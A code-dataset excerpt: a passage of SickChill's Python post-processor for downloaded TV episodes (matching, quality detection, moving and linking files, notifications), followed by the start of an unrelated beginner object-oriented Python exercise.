self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_copy, subtitles=subtitles)\n\n def _hardlink(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Hardlink file and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to create a hard linked file\n :param new_base_name: The base filename (no extension) to use during the link. Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def _int_hard_link(cur_file_path, new_file_path):\n self._log(\n _(\"Hard linking file from {cur_file_path} to {new_file_path}\").format(cur_file_path=cur_file_path, new_file_path=new_file_path), logger.DEBUG\n )\n try:\n helpers.hardlinkFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to link file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_hard_link, subtitles=subtitles)\n\n def _moveAndSymlink(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n Move file, symlink source location back to destination, and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to move the file to create a symbolic link to\n :param new_base_name: The base filename (no extension) to use during the link. Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def _int_move_and_sym_link(cur_file_path, new_file_path):\n self._log(\n _(\"Moving then symbolically linking file from {cur_file_path} to {new_file_path}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path\n ),\n logger.DEBUG,\n )\n try:\n helpers.moveAndSymlinkFile(cur_file_path, new_file_path)\n helpers.chmodAsParent(new_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to link file from {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_move_and_sym_link, subtitles=subtitles)\n\n def _symlink(self, file_path, new_path, new_base_name, associated_files=False, subtitles=False):\n \"\"\"\n symlink destination to source location, and set proper permissions\n\n :param file_path: The full path of the media file to move\n :param new_path: Destination path where we want to move the file to create a symbolic link to\n :param new_base_name: The base filename (no extension) to use during the link. Use None to keep the same name.\n :param associated_files: Boolean, whether we should move similarly-named files too\n \"\"\"\n\n def _int_sym_link(cur_file_path, new_file_path):\n self._log(\n _(\"Creating then symbolically linking file from {new_file_path} to {cur_file_path}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path\n ),\n logger.DEBUG,\n )\n try:\n os.symlink(cur_file_path, new_file_path)\n helpers.chmodAsParent(cur_file_path)\n except (IOError, OSError) as error:\n self._log(\n _(\"Unable to link file {cur_file_path} to {new_file_path}: {error}\").format(\n cur_file_path=cur_file_path, new_file_path=new_file_path, error=error\n ),\n logger.ERROR,\n )\n raise\n\n self._combined_file_operation(file_path, new_path, new_base_name, associated_files, action=_int_sym_link, subtitles=subtitles)\n\n def _history_lookup(self):\n \"\"\"\n Look up the NZB name in the history and see if it contains a record for self.release\n\n :return: A (indexer_id, season, [], quality, version) tuple. The first two may be None if none were found.\n \"\"\"\n\n to_return = (None, None, [], None, None)\n\n # if we don't have either of these then there's nothing to use to search the history for anyway\n if not self.release_name and not self.folder_name:\n self.in_history = False\n return to_return\n\n # make a list of possible names to use in the search\n names = []\n if self.release_name:\n names.append(self.release_name)\n no_extension = remove_extension(self.release_name)\n if no_extension not in names:\n names.append(no_extension)\n if self.folder_name:\n names.append(self.folder_name)\n\n # search the database for a possible match and return immediately if we find one\n main_db_con = db.DBConnection()\n for curName in names:\n search_name = re.sub(r\"[\\.\\- ]\", \"_\", curName)\n sql_results = main_db_con.select(\n \"SELECT showid, season, quality, version, resource FROM history WHERE resource LIKE ? AND (action % 100 = 4 OR action % 100 = 6)\", [search_name]\n )\n\n if not sql_results:\n continue\n\n indexer_id = int(sql_results[0][\"showid\"])\n season = int(sql_results[0][\"season\"])\n quality = int(sql_results[0][\"quality\"])\n version = int(sql_results[0][\"version\"])\n\n if quality == common.Quality.UNKNOWN:\n quality = None\n\n show = Show.find(settings.showList, indexer_id)\n\n self.in_history = True\n self.version = version\n to_return = (show, season, [], quality, version)\n\n qual_str = common.Quality.qualityStrings[quality] if quality is not None else quality\n result_name = show.name if show else \"UNDEFINED\"\n self._log(\n _(\"Found result in history for {result_name} - Season: {season} - Quality: {qual_str} - Version: {version}\").format(\n result_name=result_name, season=season, qual_str=qual_str, version=version\n ),\n logger.DEBUG,\n )\n\n return to_return\n\n self.in_history = False\n return to_return\n\n def _finalize(self, parse_result):\n \"\"\"\n Store parse result if it is complete and final\n\n :param parse_result: Result of parsers\n \"\"\"\n self.release_group = parse_result.release_group\n\n # remember whether it's a proper\n if parse_result.extra_info:\n self.is_proper = re.search(r\"\\b(proper|repack|real)\\b\", parse_result.extra_info, re.I) is not None\n\n # if the result is complete then remember that for later\n # if the result is complete then set release name\n if (\n parse_result.series_name\n and ((parse_result.season_number is not None and parse_result.episode_numbers) or parse_result.air_date)\n and parse_result.release_group\n ):\n if not self.release_name:\n self.release_name = helpers.remove_non_release_groups(remove_extension(os.path.basename(parse_result.original_name)))\n\n else:\n logger.debug(\"Parse result not sufficient (all following have to be set). will not save release name\")\n logger.debug(f\"Parse result(series_name): {parse_result.series_name}\")\n logger.debug(f\"Parse result(season_number): {parse_result.season_number}\")\n logger.debug(f\"Parse result(episode_numbers): {parse_result.episode_numbers}\")\n logger.debug(f\" or Parse result(air_date): {parse_result.air_date}\")\n logger.debug(f\"Parse result(release_group): {parse_result.release_group}\")\n\n def _analyze_name(self, name):\n \"\"\"\n Takes a name and tries to figure out a show, season, and episode from it.\n\n :param name: A string which we want to analyze to determine show info from (str)\n\n :return: A (indexer_id, season, [episodes]) tuple. The first two may be None and episodes may be []\n if none were found.\n \"\"\"\n\n to_return = (None, None, [], None, None)\n\n if not name:\n return to_return\n\n logger.debug(f\"Analyzing name {name}\")\n\n name = helpers.remove_non_release_groups(remove_extension(name))\n\n parse_result = guessit_findit(name)\n if not parse_result:\n return to_return\n\n # show object\n show = parse_result.show\n\n if parse_result.is_air_by_date:\n season = -1\n episodes = [parse_result.air_date]\n else:\n season = parse_result.season_number\n episodes = parse_result.episode_numbers\n\n to_return = (show, season, episodes, parse_result.quality, None)\n\n self._finalize(parse_result)\n return to_return\n\n @staticmethod\n def _build_anidb_episode(connection, filePath):\n \"\"\"\n Look up anidb properties for an episode\n\n :param connection: anidb connection handler\n :param filePath: file to check\n :return: episode object\n \"\"\"\n ep = adba.Episode(\n connection,\n file_path=Path(filePath),\n paramsF=[\"quality\", \"anidb_file_name\", \"crc32\"],\n paramsA=[\"epno\", \"english_name\", \"short_name_list\", \"other_name\", \"synonym_list\"],\n )\n\n return ep\n\n def _add_to_anidb_mylist(self, filePath):\n \"\"\"\n Adds an episode to anidb mylist\n\n :param filePath: file to add to mylist\n \"\"\"\n if helpers.set_up_anidb_connection():\n if not self.anidbEpisode: # seems like we could parse the name before, now lets build the anidb object\n self.anidbEpisode = self._build_anidb_episode(settings.ADBA_CONNECTION, filePath)\n\n self._log(_(\"Adding the file to the anidb mylist\"), logger.DEBUG)\n try:\n self.anidbEpisode.add_to_mylist(status=1) # status = 1 sets the status of the file to \"internal HDD\"\n except Exception as error:\n self._log(f\"exception msg: {error}\")\n\n def _find_info(self):\n \"\"\"\n For a given file try to find the showid, season, and episode.\n\n :return: A (show, season, episodes, quality, version) tuple\n \"\"\"\n\n show = season = quality = version = None\n episodes = []\n\n # try to look up the release in history\n attempt_list = [\n self._history_lookup,\n # try to analyze the release name\n lambda: self._analyze_name(self.release_name),\n # try to analyze the file name\n lambda: self._analyze_name(self.filename),\n # try to analyze the dir name\n lambda: self._analyze_name(self.folder_name),\n # try to analyze the file + dir names together\n lambda: self._analyze_name(self.directory),\n # try to analyze the dir + file name together as one name\n lambda: self._analyze_name(f\"{self.folder_name} {self.filename}\"),\n ]\n\n # attempt every possible method to get our info\n for cur_attempt in attempt_list:\n try:\n cur_show, cur_season, cur_episodes, cur_quality, cur_version = cur_attempt()\n except (InvalidNameException, InvalidShowException) as error:\n logger.debug(f\"{error}\")\n continue\n\n if not cur_show:\n continue\n else:\n show = cur_show\n\n if cur_quality and not (self.in_history and quality):\n quality = cur_quality\n\n # we only get current version for animes from history to prevent issues with old database entries\n if cur_version is not None:\n version = cur_version\n\n if cur_season is not None:\n season = cur_season\n if cur_episodes:\n episodes = cur_episodes\n\n # for air-by-date shows we need to look up the season/episode from database\n if season == -1 and show and episodes:\n self._log(\"Looks like this is an air-by-date or sports show, attempting to convert the date to season/episode\", logger.DEBUG)\n\n try:\n airdate = episodes[0].toordinal()\n except AttributeError:\n airdate_value = episodes[0]\n self._log(_(\"Could not convert to a valid airdate: {airdate_value}\").format(airdate_value=airdate_value), logger.DEBUG)\n episodes = []\n continue\n\n main_db_con = db.DBConnection()\n # Ignore season 0 when searching for episode(Conflict between special and regular episode, same air date)\n sql_result = main_db_con.select(\n \"SELECT season, episode FROM tv_episodes WHERE showid = ? and indexer = ? and airdate = ? and season != 0\",\n [show.indexerid, show.indexer, airdate],\n )\n\n if sql_result:\n season = int(sql_result[0][\"season\"])\n episodes = [int(sql_result[0][\"episode\"])]\n else:\n # Found no result, try with season 0\n sql_result = main_db_con.select(\n \"SELECT season, episode FROM tv_episodes WHERE showid = ? and indexer = ? and airdate = ?\", [show.indexerid, show.indexer, airdate]\n )\n if sql_result:\n season = int(sql_result[0][\"season\"])\n episodes = [int(sql_result[0][\"episode\"])]\n else:\n self._log(f\"Unable to find episode with date {episodes[0]} for show {show.indexerid}, skipping\", logger.DEBUG)\n # we don't want to leave dates in the episode list if we couldn't convert them to real episode numbers\n episodes = []\n continue\n\n # if there's no season then we can hopefully just use 1 automatically\n elif season is None and show:\n main_db_con = db.DBConnection()\n numseasonsSQlResult = main_db_con.select(\n \"SELECT COUNT(DISTINCT season) FROM tv_episodes WHERE showid = ? and indexer = ? and season != 0\", [show.indexerid, show.indexer]\n )\n if int(numseasonsSQlResult[0][0]) == 1 and season is None:\n self._log(_(\"Don't have a season number, but this show appears to only have 1 season, setting season number to 1...\"), logger.DEBUG)\n season = 1\n\n if show and season and episodes:\n return show, season, episodes, quality, version\n\n return show, season, episodes, quality, version\n\n def _get_ep_obj(self, show, season, episodes):\n \"\"\"\n Retrieve the TVEpisode object requested.\n\n :param show: The show object belonging to the show we want to process\n :param season: The season of the episode (int)\n :param episodes: A list of episodes to find (list of ints)\n\n :return: If the episode(s) can be found then a TVEpisode object with the correct related eps will\n be instantiated and returned. If the episode can't be found then None will be returned.\n \"\"\"\n\n root_ep = None\n for cur_episode in episodes:\n self._log(f\"Retrieving episode object for {episode_num(season, cur_episode)}\", logger.DEBUG)\n\n # now that we've figured out which episode this file is just load it manually\n try:\n curEp = show.getEpisode(season, cur_episode)\n if not curEp:\n raise EpisodeNotFoundException()\n except EpisodeNotFoundException as error:\n self._log(_(\"Unable to create episode: {error}\").format(error=error), logger.DEBUG)\n raise EpisodePostProcessingFailedException()\n\n # associate all the episodes together under a single root episode\n if root_ep is None:\n root_ep = curEp\n root_ep.relatedEps = []\n elif curEp not in root_ep.relatedEps:\n root_ep.relatedEps.append(curEp)\n\n return root_ep\n\n def _get_quality(self, ep_obj):\n \"\"\"\n Determines the quality of the file that is being post processed, first by checking if it is directly\n available in the TVEpisode's status or otherwise by parsing through the data available.\n\n :param ep_obj: The TVEpisode object related to the file we are post processing\n :return: A quality value found in common.Quality\n \"\"\"\n\n # if there is a quality available in the status then we don't need to bother guessing from the filename\n if ep_obj.status in common.Quality.SNATCHED + common.Quality.SNATCHED_PROPER + common.Quality.SNATCHED_BEST:\n ep_status_, ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n if ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"The old status had a quality in it, using that: \") + common.Quality.qualityStrings[ep_quality], logger.DEBUG)\n return ep_quality\n\n # release name is the most reliable if it exists, followed by folder name and lastly file name\n name_list = [self.release_name, self.folder_name, self.filename]\n\n # search all possible names for our new quality, in case the file or dir doesn't have it\n for cur_name in name_list:\n # some stuff might be None at this point still\n if not cur_name:\n continue\n\n ep_quality = common.Quality.nameQuality(cur_name, ep_obj.show.is_anime)\n self._log(f\"Looking up quality for name {cur_name}, got {common.Quality.qualityStrings[ep_quality]}\", logger.DEBUG)\n\n # if we find a good one then use it\n if ep_quality != common.Quality.UNKNOWN:\n logger.debug(f\"{cur_name} looks like it has quality {common.Quality.qualityStrings[ep_quality]}, using that\")\n return ep_quality\n\n # Try getting quality from the episode (snatched) status\n if ep_obj.status in common.Quality.SNATCHED + common.Quality.SNATCHED_PROPER + common.Quality.SNATCHED_BEST:\n ep_status_, ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n if ep_quality != common.Quality.UNKNOWN:\n self._log(f\"The old status had a quality in it, using that: {common.Quality.qualityStrings[ep_quality]}\", logger.DEBUG)\n return ep_quality\n\n # Try guessing quality from the file name\n ep_quality = common.Quality.nameQuality(self.directory)\n self._log(f\"Guessing quality for name {self.filename}, got {common.Quality.qualityStrings[ep_quality]}\", logger.DEBUG)\n if ep_quality != common.Quality.UNKNOWN:\n logger.debug(f\"{self.filename} looks like it has quality {common.Quality.qualityStrings[ep_quality]}, using that\")\n return ep_quality\n\n return ep_quality\n\n def _run_extra_scripts(self, ep_obj):\n \"\"\"\n Executes any extra scripts defined in the config.\n\n :param ep_obj: The object to use when calling the extra script\n \"\"\"\n\n if not settings.EXTRA_SCRIPTS:\n return\n\n for curScriptName in settings.EXTRA_SCRIPTS:\n # generate a safe command line string to execute the script and provide all the parameters\n script_cmd = [piece for piece in re.split(r'(\\'.*?\\'|\".*?\"| )', curScriptName) if piece.strip()]\n script_cmd[0] = os.path.abspath(script_cmd[0])\n self._log(f\"Absolute path to script: {script_cmd[0]}\", logger.DEBUG)\n\n script_cmd += [ep_obj._location, self.directory, str(ep_obj.show.indexerid), str(ep_obj.season), str(ep_obj.episode), str(ep_obj.airdate)]\n\n # use subprocess to run the command and capture output\n self._log(f\"Executing command: {script_cmd}\")\n try:\n p = subprocess.Popen(\n script_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=settings.DATA_DIR, universal_newlines=True\n )\n out, err = p.communicate()\n\n self._log(_(\"Script result: {out}\").format(out=(out or err).strip()), logger.DEBUG)\n\n except Exception as error:\n self._log(f\"Unable to run extra_script: {error}\")\n\n def _is_priority(self, ep_obj, new_ep_quality):\n \"\"\"\n Determines if the episode is a priority download or not (if it is expected). Episodes which are expected\n (snatched) or larger than the existing episode are priority, others are not.\n\n :param ep_obj: The TVEpisode object in question\n :param new_ep_quality: The quality of the episode that is being processed\n :return: True if the episode is priority, False otherwise.\n \"\"\"\n\n if self.is_priority:\n return True\n\n old_ep_status_, old_ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n\n # if SC downloaded this on purpose we likely have a priority download\n if self.in_history or ep_obj.status in common.Quality.SNATCHED + common.Quality.SNATCHED_PROPER + common.Quality.SNATCHED_BEST:\n # if the episode is still in a snatched status, then we can assume we want this\n if not self.in_history:\n self._log(\"SC snatched this episode and it is not processed before\", logger.DEBUG)\n return True\n\n # if it's in history, we only want it if the new quality is higher or if it's a proper of equal or higher quality\n if new_ep_quality > old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(\"SC snatched this episode and it is a higher quality so I'm marking it as priority\", logger.DEBUG)\n return True\n\n if self.is_proper and new_ep_quality >= old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"SC snatched this episode and it is a proper of equal or higher quality so I'm marking it as priority\"), logger.DEBUG)\n return True\n\n return False\n\n # if the user downloaded it manually and it's higher quality than the existing episode then it's priority\n if new_ep_quality > old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"This was manually downloaded but it appears to be better quality than what we have so I'm marking it as priority\"), logger.DEBUG)\n return True\n\n # if the user downloaded it manually and it appears to be a PROPER/REPACK then it's priority\n if self.is_proper and new_ep_quality >= old_ep_quality and new_ep_quality != common.Quality.UNKNOWN:\n self._log(_(\"This was manually downloaded but it appears to be a proper so I'm marking it as priority\"), logger.DEBUG)\n return True\n\n return False\n\n def process(self):\n \"\"\"\n Post-process a given file\n\n :return: True on success, False on failure\n \"\"\"\n\n self._log(_(\"Processing {directory} ({release_name})\").format(directory=self.directory, release_name=self.release_name))\n\n if os.path.isdir(self.directory):\n self._log(_(\"File {directory} seems to be a directory\").format(directory=self.directory))\n return False\n\n if not os.path.exists(self.directory):\n self._log(_(\"File {directory} doesn't exist, did unrar fail?\").format(directory=self.directory))\n return False\n\n for ignore_file in self.IGNORED_FILESTRINGS:\n if ignore_file in self.directory:\n self._log(_(\"File {directory} is ignored type, skipping\").format(directory=self.directory))\n return False\n\n # reset per-file stuff\n self.in_history = False\n\n # reset the anidb episode object\n self.anidbEpisode = None\n\n # try to find the file info\n (show, season, episodes, quality, version) = self._find_info()\n if not show:\n self._log(_(\"This show isn't in your list, you need to add it to SC before post-processing an episode\"))\n raise EpisodePostProcessingFailedException()\n elif season is None or not episodes:\n self._log(_(\"Not enough information to determine what episode this is. Quitting post-processing\"))\n return False\n\n # retrieve/create the corresponding TVEpisode objects\n ep_obj = self._get_ep_obj(show, season, episodes)\n old_ep_status_, old_ep_quality = common.Quality.splitCompositeStatus(ep_obj.status)\n\n # get the quality of the episode we're processing\n if quality and not common.Quality.qualityStrings[quality] == \"Unknown\":\n self._log(_(\"Snatch history had a quality in it, using that: \") + common.Quality.qualityStrings[quality], logger.DEBUG)\n new_ep_quality = quality\n else:\n new_ep_quality = self._get_quality(ep_obj)\n\n new_quality_string = common.Quality.qualityStrings[new_ep_quality]\n logger.debug(_(\"Quality of the episode we're processing: {new_quality_string}\").format(new_quality_string=new_quality_string))\n\n # see if this is a priority download (is it snatched, in history, PROPER, or BEST)\n priority_download = self._is_priority(ep_obj, new_ep_quality)\n self._log(_(\"Is ep a priority download: \") + str(priority_download), logger.DEBUG)\n\n # get the version of the episode we're processing\n if version:\n self._log(_(\"Snatch history had a version in it, using that: v\") + str(version), logger.DEBUG)\n new_ep_version = version\n else:\n new_ep_version = -1\n\n # check for an existing file\n existing_file_status = self._checkForExistingFile(ep_obj.location)\n\n if not priority_download:\n if existing_file_status == PostProcessor.EXISTS_SAME:\n self._log(\"File exists and new file is same size, pretending we did something\")\n return True\n\n if new_ep_quality <= old_ep_quality != common.Quality.UNKNOWN and existing_file_status != PostProcessor.DOESNT_EXIST:\n if self.is_proper and new_ep_quality == old_ep_quality:\n self._log(_(\"New file is a proper/repack, marking it safe to replace\"))\n else:\n allowed_qualities_, preferred_qualities = common.Quality.splitQuality(int(show.quality))\n if new_ep_quality not in preferred_qualities:\n self._log(_(\"File exists and new file quality is not in a preferred quality list, marking it unsafe to replace\"))\n return False\n\n # Check if the processed file season is already in our indexer. If not, the file is most probably mislabled/fake and will be skipped\n # Only proceed if the file season is > 0\n if int(ep_obj.season) > 0:\n main_db_con = db.DBConnection()\n max_season = main_db_con.select(\"SELECT MAX(season) FROM tv_episodes WHERE showid = ? and indexer = ?\", [show.indexerid, show.indexer])\n\n if not isinstance(max_season[0][0], int) or max_season[0][0] < 0:\n self._log(\n f\"File has season {ep_obj.season}, while the database does not have any known seasons yet. \"\n \"Try forcing a full update on the show and process this file again. \"\n \"The file may be incorrectly labeled or fake, aborting.\"\n )\n return False\n\n # If the file season (ep_obj.season) is bigger than the indexer season (max_season[0][0]), skip the file\n newest_season_num = max_season[0][0]\n episode_season = ep_obj.season\n if int(episode_season) > newest_season_num:\n self._log(\n _(\n \"File has season {episode_season}, while the indexer is on season {newest_season_num}. \"\n \"Try forcing a full update on the show and process this file again. \"\n \"The file may be incorrectly labeled or fake, aborting.\"\n ).format(episode_season=episode_season, newest_season_num=newest_season_num)\n )\n return False\n\n # if the file is priority then we're going to replace it even if it exists\n else:\n self._log(_(\"This download is marked a priority download so I'm going to replace an existing file if I find one\"))\n\n # try to find out if we have enough space to perform the copy or move action.\n if settings.USE_FREE_SPACE_CHECK:\n if not helpers.is_file_locked(self.directory):\n if not verify_freespace(self.directory, ep_obj.show._location, [ep_obj] + ep_obj.relatedEps, method=self.process_method):\n self._log(_(\"Not enough disk space to continue processing, exiting\"), logger.WARNING)\n return False\n else:\n self._log(_(\"Unable to determine needed file space as the source file is locked for access\"))\n\n # delete the existing file (and company)\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n try:\n self._delete(cur_ep.location, associated_files=True)\n\n # clean up any left over folders\n if cur_ep.location:\n helpers.delete_empty_folders(os.path.dirname(cur_ep.location), keep_dir=ep_obj.show._location)\n\n # clean up download-related properties\n cur_ep.cleanup_download_properties()\n except (OSError, IOError):\n raise EpisodePostProcessingFailedException(_(\"Unable to delete the existing files\"))\n\n # set the status of the episodes\n # for curEp in [ep_obj] + ep_obj.relatedEps:\n # curEp.status = common.Quality.compositeStatus(common.SNATCHED, new_ep_quality)\n\n # if the show directory doesn't exist then make it if allowed\n if not os.path.isdir(ep_obj.show._location) and settings.CREATE_MISSING_SHOW_DIRS:\n self._log(_(\"Show directory doesn't exist, creating it\"), logger.DEBUG)\n try:\n os.mkdir(ep_obj.show._location)\n helpers.chmodAsParent(ep_obj.show._location)\n\n # do the library update for synoindex\n notifiers.synoindex_notifier.addFolder(ep_obj.show._location)\n except (OSError, IOError):\n raise EpisodePostProcessingFailedException(_(\"Unable to create the show directory: \") + ep_obj.show._location)\n\n # get metadata for the show (but not episode because it hasn't been fully processed)\n ep_obj.show.writeMetadata(True)\n\n # update the ep info before we rename so the quality & release name go into the name properly\n sql_l = []\n\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n with cur_ep.lock:\n if self.release_name:\n self._log(_(\"Found release name \") + self.release_name, logger.DEBUG)\n cur_ep.release_name = self.release_name\n elif self.filename:\n # If we can't get the release name we expect, save the original release name instead\n self._log(_(\"Using original release name \") + self.filename, logger.DEBUG)\n cur_ep.release_name = self.filename\n else:\n cur_ep.release_name = \"\"\n\n cur_ep.status = common.Quality.compositeStatus(common.DOWNLOADED, new_ep_quality)\n\n cur_ep.subtitles = \"\"\n\n cur_ep.subtitles_searchcount = 0\n\n cur_ep.subtitles_lastsearch = \"0001-01-01 00:00:00\"\n\n cur_ep.is_proper = self.is_proper\n\n cur_ep.version = new_ep_version\n\n if self.release_group:\n cur_ep.release_group = self.release_group\n else:\n cur_ep.release_group = \"\"\n\n sql_l.append(cur_ep.get_sql())\n\n # Just want to keep this consistent for failed handling right now\n releaseName = show_name_helpers.determine_release_name(self.folder_path, self.release_name)\n if releaseName:\n self.history.logSuccess(releaseName)\n else:\n self._log(_(\"Warning: Couldn't find release in snatch history\"), logger.INFO)\n\n # find the destination folder\n try:\n proper_path = ep_obj.proper_path()\n proper_absolute_path = os.path.join(ep_obj.show.location, proper_path)\n\n dest_path = os.path.dirname(proper_absolute_path)\n except ShowDirectoryNotFoundException:\n raise EpisodePostProcessingFailedException(_(\"Unable to post-process an episode if the show dir doesn't exist, quitting\"))\n\n self._log(_(\"Destination folder for this episode: \") + dest_path, logger.DEBUG)\n\n # create any folders we need\n helpers.make_dirs(dest_path)\n\n # figure out the base name of the resulting episode file\n if settings.RENAME_EPISODES:\n old_path = Path(self.filename)\n orig_extension = old_path.suffix\n new_base_name = os.path.basename(proper_path)\n new_filename = f\"{new_base_name}{orig_extension}\"\n else:\n # if we're not renaming then there's no new base name, we'll just use the existing name\n new_base_name = None\n new_filename = self.filename\n\n # add to anidb\n if ep_obj.show.is_anime and settings.ANIDB_USE_MYLIST:\n self._add_to_anidb_mylist(self.directory)\n\n try:\n # move the episode and associated files to the show dir\n if self.process_method == METHOD_COPY:\n if helpers.is_file_locked(self.directory):\n raise EpisodePostProcessingFailedException(_(\"File is locked for reading\"))\n self._copy(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_MOVE:\n if helpers.is_file_locked(self.directory, True):\n raise EpisodePostProcessingFailedException(_(\"File is locked for reading/writing\"))\n self._move(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_HARDLINK:\n self._hardlink(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_SYMLINK:\n if helpers.is_file_locked(self.directory, True):\n raise EpisodePostProcessingFailedException(_(\"File is locked for reading/writing\"))\n self._moveAndSymlink(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n elif self.process_method == METHOD_SYMLINK_REVERSED:\n self._symlink(self.directory, dest_path, new_base_name, settings.MOVE_ASSOCIATED_FILES, settings.USE_SUBTITLES and ep_obj.show.subtitles)\n else:\n logger.exception(_(\"Unknown process method: \") + str(self.process_method))\n raise EpisodePostProcessingFailedException(_(\"Unable to move the files to their new home\"))\n except (OSError, IOError):\n raise EpisodePostProcessingFailedException(_(\"Unable to move the files to their new home\"))\n\n for cur_ep in [ep_obj] + ep_obj.relatedEps:\n with cur_ep.lock:\n cur_ep.location = os.path.join(dest_path, new_filename)\n # download subtitles\n if settings.USE_SUBTITLES and ep_obj.show.subtitles and (cur_ep.season != 0 or settings.SUBTITLES_INCLUDE_SPECIALS):\n cur_ep.refreshSubtitles()\n cur_ep.download_subtitles(force=True)\n sql_l.append(cur_ep.get_sql())\n\n # now that processing has finished, we can put the info in the DB. If we do it earlier, then when processing fails, it won't try again.\n if sql_l:\n main_db_con = db.DBConnection()\n main_db_con.mass_action(sql_l)\n\n ep_obj.airdateModifyStamp()\n\n if settings.USE_ICACLS and os.name == \"nt\":\n os.popen('icacls \"' + ep_obj._location + '\"* /reset /T')\n\n # generate nfo/tbn\n try:\n ep_obj.createMetaFiles()\n except Exception:\n logger.info(_(\"Could not create/update meta files. Continuing with postProcessing...\"))\n\n # log it to history\n self.history.logDownload(ep_obj, self.directory, new_ep_quality, self.release_group, new_ep_version)\n\n # If any notification fails, don't stop postProcessor\n try:\n # send notifications\n notifiers.notify_download(ep_obj._format_pattern(\"%SN - %Sx%0E - %EN - %QN\"))\n\n # do the library update for KODI\n notifiers.kodi_notifier.update_library(ep_obj.show.name)\n\n # do the library update for Plex\n notifiers.plex_notifier.update_library(ep_obj)\n\n # do the library update for EMBY\n notifiers.emby_notifier.update_library(ep_obj.show)\n\n # do the library update for NMJ\n # nmj_notifier kicks off its library update when the notify_download is issued (inside notifiers)\n\n # do the library update for Synology Indexer\n notifiers.synoindex_notifier.addFile(ep_obj.location)\n\n # do the library update for pyTivo\n notifiers.pytivo_notifier.update_library(ep_obj)\n\n # do the library update for Trakt\n notifiers.trakt_notifier.update_library(ep_obj)\n except Exception:\n logger.info(_(\"Some notifications could not be sent. Continuing with postProcessing...\"))\n\n self._run_extra_scripts(ep_obj)\n\n # If any notification fails, don't stop postProcessor\n try:\n # send notifications\n notifiers.email_notifier.notify_postprocess(ep_obj._format_pattern(\"%SN - %Sx%0E - %EN - %QN\"))\n except Exception:\n logger.info(_(\"Some notifications could not be sent. Finishing postProcessing...\"))\n\n return True\n\n\ndef guessit_findit(name: str) -> Union[\"ParseResult\", None]:\n logger.debug(f\"Trying a new way to verify if we can parse this file\")\n title = guessit(name, {\"type\": \"episode\"}).get(\"title\")\n if title:\n show: \"TVShow\" = helpers.get_show(title, False)\n if show:\n try:\n np = NameParser(showObj=show).parse(name, cache_result=False)\n return np\n except (InvalidNameException, InvalidShowException) as error:\n logger.debug(f\"Sorry, guessit failed to parse the file name for {show}: {name} (Error: {error} ... continuing with the old way\")\n try:\n np = NameParser().parse(name, cache_result=False)\n return np\n except (InvalidNameException, InvalidShowException) as error:\n logger.debug(f\"Could not properly parse a show and episode from [{name}]: {error}\")\n\n return None\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/postProcessor.py","file_name":"postProcessor.py","file_ext":"py","file_size_in_byte":57764,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"38683954699","text":"from fpdf import FPDF\nfrom tkinter import messagebox, filedialog\nimport tkinter as tk\nfrom abc import ABC, abstractmethod\n\n\nclass Vehicle:\n def __init__(self, brand, color):\n self.brand = brand\n self.color = color\n\n def __show(self):\n print(\"I am SuperClass\")\n\n\nclass car(Vehicle):\n def __init__(self, brand, color, num_wheels):\n super().__init__(brand, color)\n self.num_wheels = num_wheels\n\n def display_info(self):\n print(\"I am subclass\")\n\n\nmycar = car(\"Honda\", \"Brown\", 4)\n\nmycar._Vehicle__show()\n\n# I did Polymorphism with this next example\n# Exercise\n\n\nclass Shape:\n def display(self):\n print(\"I am SUperclass\")\n\n\nclass Rectangle(Shape):\n def __init__(self, lside, s_side):\n self.lside = lside\n self.s_side = s_side\n\n def rperimeter(self):\n Perimeter = (2 * self.lside) + (2 * self.s_side)\n print(\"Perimeter of Rect:\", Perimeter)\n\n def display(self):\n print(\"I am 1st subclass\")\n\n\nR1 = Rectangle(7, 4)\n# R1.rperimeter()\n\n\nclass Circle(Shape):\n def __init__(self, radius):\n self.radius = radius\n\n def Area(self):\n area = 2 * 3.14 * (self.radius * self.radius)\n print(\"The Area:\", area)\n\n def display(self):\n print(\"I am 2nd subclass\")\n\n\nC1 = 